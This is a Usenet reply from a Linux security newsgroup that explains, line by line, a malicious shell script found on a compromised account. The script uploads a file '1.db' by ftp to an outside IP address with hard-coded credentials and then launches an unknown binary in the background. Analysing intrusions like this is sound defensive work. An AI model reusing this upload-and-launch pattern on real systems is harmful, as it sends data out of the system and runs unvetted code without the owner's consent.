Re: Phishing Attempt

On Tue, 02 Oct 2007, in the Usenet newsgroup comp.os.linux.security, in article
<47024555$0$15142$afc38c87@xxxxxxxxxxxxxxxxxxxx>, Mark wrote:

Mark wrote:

The account home directory contained a simple shell script of just over
a dozen lines I can't see what it's doing there.

OK below is the text of the script as it was sent back to me.

Confusion - above you say the script was in the home directory, while
here, you say it was sent back to you. WTF?

I can normally understand shell scripts, but I can't see what this one
is doing.

Your Linux box may only have a soft link from /usr/share/man/man1/sh.1
to something else - probably /usr/share/man/man1/bash.1 - you can follow
that to see what it's doing.

[useless empty lines deleted]

#!/bin/sh
HOST=3D'58.105.225.59'

That sets the variable 'HOST' to the IP address you are posting from.
The '=3D' is a mime abortion which actually translates to an equal sign.

USER=3D'test'
PASSWD=3D'testing'
FILE=3D'1.db'

Setting three more variables - what is the contents of file "1.db" in
this home directory?

=20

More mime crap - actual a space character

ftp -n $HOST <<END_SCRIPT
quote USER $USER
quote PASS $PASSWD
put $FILE
quit
END_SCRIPT

run the ftp command, connecting to the ftp server on 58.105.225.59,
logging in as user test with password testing, and uploading the file
'1.db' from the current directory on the host this script is run from,
and then quitting.

sleep 70
./pula &

Sleep for 70 seconds, and then run the application 'pula' which is also
in the current directory, putting that application into the background.

'pula' is a city in Croatia (14E/45N), the currency of Botswana (where
it apparently means "rain"), and seems to be some form of windoze worm
or virus that may have originated in Indonesia. I hadn't heard of it
effecting Linux before, and it doesn't show up in the list of malware
searched for in the windoze-wannabe "tools" chkrootkit or rkhunter.
Perhaps you should be looking at that file - starting with the command

file ./pula

if you haven't wiped the directory already.

exit 0

That's the end of the script. Not knowing what's in the 'pula' file,
it's not possible to say what's going on, but this thing you quoted
seems to be running the 'pula' file, sleeping for 70 seconds. It's
also ftp'ing a file named '1.db' to the ftp account 'test' on the host
58.105.225.59. Did you look to see what is in there?

Actually, this looks more as if the host 58.105.225.59 is/was being used
as a 'drop-box', and you may find it useful searching that system to see
where the files are going. It _could_ be that another computer elsewhere
was connecting to the ftp server on 58.105.225.59 using the same account
name/password, and 'get'ing (and perhaps removing) the file, in which
case the only evidence might be in the (non-existent) ftp server logs.

Old guy
.

Relevant Pages
Quantcast